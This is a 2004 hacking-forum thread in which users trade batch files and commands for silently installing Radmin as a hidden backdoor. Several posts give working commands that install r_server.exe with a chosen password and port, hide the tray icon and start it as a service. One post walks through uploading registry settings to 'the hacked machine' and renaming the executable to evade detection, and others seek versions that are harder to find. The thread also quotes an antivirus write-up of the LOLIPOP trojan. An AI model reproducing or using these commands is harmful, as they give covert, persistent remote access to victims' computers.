i donīt find anything file to download by google or other with the lolipop.bat you can manipulate the registry for radmin. like servicename, i hope
other files needed too:
dtreg.exe <<-- this one i need to
i hope anybody share this one
skater
Jun 10 2004, 05:28 PM
CODE
r_server.exe /install /silence r_server.EXE /pass:yourpass /save /silence r_server.EXE /install /silence r_server.EXE /start /silence echo off net start r_server
found it on a server
you can download the files by searching in google
Learnsecurity
Jun 10 2004, 05:30 PM
hmm, who is needed the dtreg.exe, this manipulate the registry
Partizaan
Jun 10 2004, 07:31 PM
this one i wrote myself
@echo off ECHO INSTALLING SERVER changedname.exe /pass:partizaanownzyourass /port:6969 /install /save /silence ECHO SERVER INSTALLED NOW BOOTING UP changedname.exe /start ECHO SERVER IS BOOTED - ON ERROR RUN TLIST.EXE exit no icon in tray ( i tested it) no other files needed
make sure u upload
the server.exe + AdmDll.dll + your bat file
greetz and respect
labbertasche
Jun 10 2004, 07:51 PM
**lol** you find the bat on a server
look **gooooogle** and you find the program little tip this are the magic words "DTREG registry"
.... perhaps you find the complete *.exe
greets labbertasche
ps: do you know the passoword from the bat file for radmin
B3T4
Jun 10 2004, 07:53 PM
sssssssst, we have already a topic about this in trial
jhd
Jun 10 2004, 08:15 PM
thx for the batfile. Now i know the command /silence
ryoggi
Jun 11 2004, 08:45 AM
QUOTE (Partizaan @ Jun 10 2004, 07:31 PM)
this one i wrote myself
@echo off ECHO INSTALLING SERVER changedname.exe /pass:partizaanownzyourass /port:6969 /install /save /silence ECHO SERVER INSTALLED NOW BOOTING UP changedname.exe /start ECHO SERVER IS BOOTED - ON ERROR RUN TLIST.EXE exit no icon in tray ( i tested it) no other files needed
make sure u upload
the server.exe + AdmDll.dll + your bat file
greetz and respect
Fine, thks u.
I have the same but mine is with reg key.
Learnsecurity
Jun 11 2004, 11:22 AM
NO NO NO, read anything the post, there are 2 files. no the standard installation from radmin, i know, installe silence blablabla.
but there are two files. dtreg.exe and "lolipop.bat" (the real name), in the lolipob.bat is writing how it use dtreg.exe to manipulate the registrie. the service name i know. or anybody have another servicename that r_server. And the files canīt find with google.de "lolipop.bat" only writing over this file. but noch content of this file. dtreg.exe you need 1.0 t version and this also not for download.
i hope anything can help.
K1LL3RB0Y
Jun 11 2004, 11:25 AM
hmm like thiss found it at a virus list
QUOTE
Details: Installation and Autostart
This malware usually arrives as a self-extracting WinRAR executable. Upon execution, it drops the following files in the directory where it was executed:
lolipop.bat (1,356 bytes) The Trojan runs this the batch file after extraction.
r_server.exe (241,664 bytes) This legitimate application called Remote Administrator by Famatech is used by the Trojan as backdoor component.
AdmDll.dll (90,112 bytes) This file is a component of r_server.exe.
raddrv.dll (29,408 bytes) This file is another component of r_server.exe.
dtreg.exe (73,728 bytes) This legitimate tool called DTREG v1.0t is used by LOLIPOP.BAT to modify the settings of r_server.exe. On Windows 9x systems, r_server.exe uses the following registry entries so that it executes every time Windows starts:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\ CurrentVersion\Run r_server = <Path where the malware was executed>\r_server.exe /service
On NT based platforms, r_server.exe registers itself as a service by creating the following registry key, where it also stores information:
It has the service display name, Remote Administrator Service.
Malicious Routines
This Trojan sets up the infected system for remote access. After extracting its content, it runs the initial script LOLIPOP.BAT, which installs Remote Administrator in silent mode to hide the installation process from the user.
LOLIPOP.BAT then uses the dropped file dtreg.exe to modify the settings of Remote Administrator by editing the registry entries found in the following location:
HKEY_LOCAL_MACHINE\System\RAdmin\v2.0
It sets Remote Administrator to listen on port 8150 instead of the default port 4899 and disables it from displaying an icon in the system tray to hide its presence in the system.
Learnsecurity
Jun 11 2004, 11:28 AM
^^ i know, but thats not the file. i believe anything have this bat @ home
h3llraz0r
Jun 11 2004, 01:32 PM
this is not the lolipop.bat but one just like it, i think this one is set to port 4898, but you can change that to something else you like
hmm, the lolipop.bat dosnīt change anything on the system-service-name. itīs the normal installation with a .bat and .reg. dtreg is only use to import in registry. thats shit, i hope can change the systemservice , thanks for help, somebody has shits told.
Player
Jun 12 2004, 04:01 PM
does anyone have a hex edited radmin so that we could use different registry branch and different name dll with it so it would be harder to find?
Thom
Jun 13 2004, 01:48 AM
I read before on this forum that some dude tried to hexedit the exe and change service name without sucess, i think he said it was protected or something... good luck though u might be able to get it
does this add it as a service? i noticed it does a net start at the end
Neo_
Jun 13 2004, 08:53 PM
Why not use regedit /s plop.reg ?
B3T4
Jun 13 2004, 09:27 PM
let me break it down for u
Lolipop.bat is nothing more then the reg-keys which are set when u install (and config) radmin. So if u wanna make ur own lolipop, install radmin on ur machine and set everything the way u like it (port / pass / no icon / etc). Then run regedit.exe and goto HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters
dump that to a .reg file and upload it to the hacked machine. Now type:
radmin.exe /installservice /silence
now import the .reg to the hacked machine. After that type : net start r_server and ur radmin is running as a service now.
if uwant to change something easy do radmin.exe /port <port> /pass <pass> /save (im not sure if this is enough for everything and that u dont need the .reg anymore but if u install the reg ur save. BUT, if there is already a configged radmin the the machine than a .reg wont help u and u need to do it this way).
Has u may have noticed is that when u install radmin as a service is that it itself copies to <windir>\system32\r_server.exe . So if u want to change the name of the .exe copy it to <windir>\system32\ so it wont need to be copied.
To change the servicename, use a tool that can change these things (like my spliff ). Untill last update i have not heard anyone who managed to hex-edit radmin so i suggest u dont wast ur time on it. It should be possible to change the ShortServiceName for it (r_server), coz obviously it is stored somewhere in the registery so doing some searching and with some zen u could be able to pull it off.
Player
Jun 14 2004, 01:32 AM
i searched the forum for your spliff, but had no luck, will you post a link please? thanks
B3T4
Jun 14 2004, 09:34 AM
QUOTE (Player @ Jun 14 2004, 01:32 AM)
i searched the forum for your spliff, but had no luck, will you post a link please? thanks
little tip this are the magic words "DTREG registry"
